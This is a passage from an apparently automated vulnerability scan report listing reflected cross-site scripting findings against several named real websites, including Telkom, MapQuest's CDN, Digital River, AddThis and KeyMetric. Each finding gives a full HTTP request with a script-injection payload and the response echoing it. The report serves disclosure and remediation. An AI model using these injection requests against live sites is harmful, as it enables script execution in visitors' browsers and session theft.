X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23327
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<a href="/products-servicesae525"><script>alert(1)</script>66dba90169e/index.html?&lid=id" class="blue">
...[SNIP]...

4.58. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /produk-layanan/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1f29<script>alert(1)</script>636cefd39c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /produk-layananb1f29<script>alert(1)</script>636cefd39c0/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:21 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23707
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/produk-layananb1f29<script>alert(1)</script>636cefd39c0/index.html</b>
...[SNIP]...

4.59. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /produk-layanan/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ba9b"><script>alert(1)</script>1ab312460db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /produk-layanan2ba9b"><script>alert(1)</script>1ab312460db/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:17 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23713
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/produk-layanan2ba9b"><script>alert(1)</script>1ab312460db/index.html?&lid=en">
...[SNIP]...

4.60. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /produk-layanan/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 15993--><script>alert(1)</script>bc09b8de5cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /produk-layanan15993--><script>alert(1)</script>bc09b8de5cd/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:26 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23716
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/produk-layanan15993--><script>alert(1)</script>bc09b8de5cd/index.html?&lid=en">
...[SNIP]...

4.61. http://coverage.mqcdn.com/coverage [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 306e8<script>alert(1)</script>cd3f1595c was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback306e8<script>alert(1)</script>cd3f1595c&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:15:23 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/3.2 Python/2.6.2
Pragma: no-cache
Cache-Control: no-cache
ntCoent-Length: 1754
Connection: close
Content-Type: text/javascript; charset=utf-8
Content-Length: 1754

MQA._covCallback306e8<script>alert(1)</script>cd3f1595c({"map": [{"opt": false, "copyrights": [{"html_short": "", "html": "", "text_short": "Intermap", "text": "Intermap", "id": "intermap", "group": "Imagery"}], "id": "map_na"}, {"opt": false, "copyrights"
...[SNIP]...

4.62. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d6c3e<script>alert(1)</script>14f55be02a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&d6c3e<script>alert(1)</script>14f55be02a5=1 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:15:23 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/3.2 Python/2.6.2
Pragma: no-cache
Cache-Control: no-cache
ntCoent-Length: 1720
Connection: close
Content-Type: text/javascript; charset=utf-8
Content-Length: 1720

MQA._covCallback({"map": [{"opt": false, "copyrights": [{"html_short": "", "html": "", "text_short": "Intermap", "text": "Intermap", "id": "intermap", "group": "Imagery"}], "id": "map_na"}, {"opt": fa
...[SNIP]...
"text_short": "i-cubed", "text": "i-cubed", "id": "i3", "group": "Imagery"}], "id": "i3"}]},"format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&d6c3e<script>alert(1)</script>14f55be02a5=1")

4.63. http://display.digitalriver.com/ [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9f10'-alert(1)-'6801cde2886 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244a9f10'-alert(1)-'6801cde2886&tax=par HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:55 GMT
Server: Apache/2.2.9
Expires: Sat, 25 Jun 2011 02:40:55 GMT
Last-Modified: Sat, 25 Jun 2011 02:10:55 GMT
Content-Length: 226
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244a9f10'-alert(1)-'6801cde2886&tax=par';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.64. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd9b8'-alert(1)-'b4bb3b738c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=par&cd9b8'-alert(1)-'b4bb3b738c5=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:55 GMT
Server: Apache/2.2.9
Expires: Sat, 25 Jun 2011 02:40:55 GMT
Last-Modified: Sat, 25 Jun 2011 02:10:55 GMT
Content-Length: 229
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=par&cd9b8'-alert(1)-'b4bb3b738c5=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.65. http://display.digitalriver.com/ [tax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6d7b'-alert(1)-'ca81e9e8486 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=parf6d7b'-alert(1)-'ca81e9e8486 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:55 GMT
Server: Apache/2.2.9
Expires: Sat, 25 Jun 2011 02:40:55 GMT
Last-Modified: Sat, 25 Jun 2011 02:10:55 GMT
Content-Length: 226
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=parf6d7b'-alert(1)-'ca81e9e8486';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.66. http://drh2.img.digitalriver.com/store [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drh2.img.digitalriver.com
Path:   /store

Issue detail

The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 3fe60<script>alert(1)</script>65e3098e1b1 was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store?SiteID=ea&Locale=en_US&Action=DisplayDRProductInfo&CategoryID=88318003fe60<script>alert(1)</script>65e3098e1b1&orderBy=date+descending&size=1000&version=2&eaHideSearchResults=false&output=json&content=displayName+keywords+eaProdImageSmall+eaGenre+platform&jsonp=quicksearch HTTP/1.1
Host: drh2.img.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
Last-Modified: Fri, 24 Jun 2011 13:45:32 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=9;ecid=21782327991,0)
Content-Length: 72907
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app71
Access-Control-Allow-Origin: *
Cache-Control: max-age=86400
Expires: Sat, 25 Jun 2011 13:45:42 GMT
Date: Fri, 24 Jun 2011 13:45:42 GMT
Connection: close


<!-- REQUEST ID: TIME=1308923132925:NODE=c1a7103:THREAD=692 -->


/* Digital River ProductInfo Widget */
/* JSON Output */


quicksearch({productInfo:{categoryID:"88318003fe60<script>alert(1)</script>65e3098e1b1",startIndex:0,size:1000,totalSize:268,product:[{productID:229170000,displayName:"Need for Speed... The Run Limited Edition",keywords:"NFS, needforspeed, racing, cars, car, therun, race, nfstherun, nfs
...[SNIP]...

4.67. http://ds.addthis.com/red/psi/sites/www.phuket.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.phuket.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload aa9cc<script>alert(1)</script>b2413e078b1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.phuket.com/p.json?callback=_ate.ad.hpraa9cc<script>alert(1)</script>b2413e078b1&uid=4dce8a530508b02d&url=http%3A%2F%2Fwww.phuket.com%2Fandamanwhitebeach%2F&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&ypa3gm HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308921530.3M|1308921511.3N|1308911539.1WV|1308911539.1FE|1308911539.60|1308911539.1EY|1308225884.19F|1308225884.1VV|1306359996.1OD; ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxtM7IL8lNzMzRMQQAekUI6A%3D%3D; sshs=hotmail%2Cfacebook; bt=1308921511|00004M01000004N010; dt=X; psc=4; uid=4dce8a530508b02d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 24 Jun 2011 13:22:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 24 Jun 2011 13:22:34 GMT
Connection: close

_ate.ad.hpraa9cc<script>alert(1)</script>b2413e078b1({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

4.68. http://km5002.keymetric.net/KM2.js [hist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the hist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5708b'%3balert(1)//4f9b3d66658 was submitted in the hist parameter. This input was echoed as 5708b';alert(1)//4f9b3d66658 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=5708b'%3balert(1)//4f9b3d66658&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:15 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5099

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
TString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmCookieDays = 365;
kmExt = new Date();
kmExt.setTime(kmExt.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmE5002=1:0|15149,5708b';alert(1)//4f9b3d66658;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmLat = new Date();
kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmL5002=1|1|Camp
...[SNIP]...

4.69. http://km5002.keymetric.net/KM2.js [lag parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8458'%3balert(1)//a36ce79db04 was submitted in the lag parameter. This input was echoed as a8458';alert(1)//a36ce79db04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=a8458'%3balert(1)//a36ce79db04&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:00 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5095

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
':
val = '0'; break;
case 'cpca':
val = 'Campaign not provided'; break;
case 'kmca':
val = 'Campaign not provided'; break;
case 'cpag':
val = 'a8458';alert(1)//a36ce79db04'; break;
case 'kmag':
val = 'a8458';alert(1)//a36ce79db04'; break;
case 'kw':
val = 'Keyword not provided'; break;
case 'kmkw':
val = 'Keyword not provi
...[SNIP]...

4.70. http://km5002.keymetric.net/KM2.js [las parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the las request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f274'%3balert(1)//058ce2b81c7 was submitted in the las parameter. This input was echoed as 1f274';alert(1)//058ce2b81c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=11f274'%3balert(1)//058ce2b81c7&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:45 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5099

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
5149,;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmLat = new Date();
kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmL5002=1|11f274';alert(1)//058ce2b81c7|Campaign not provided|AdGroup not provided|Keyword not provided|unk|Referrer information not available|Raw Query not available;expires=' + kmLat.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
...[SNIP]...

4.71. http://km5002.keymetric.net/KM2.js [lc1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95c71'%3balert(1)//e91e1825f03 was submitted in the lc1 parameter. This input was echoed as 95c71';alert(1)//e91e1825f03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=95c71'%3balert(1)//e91e1825f03&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
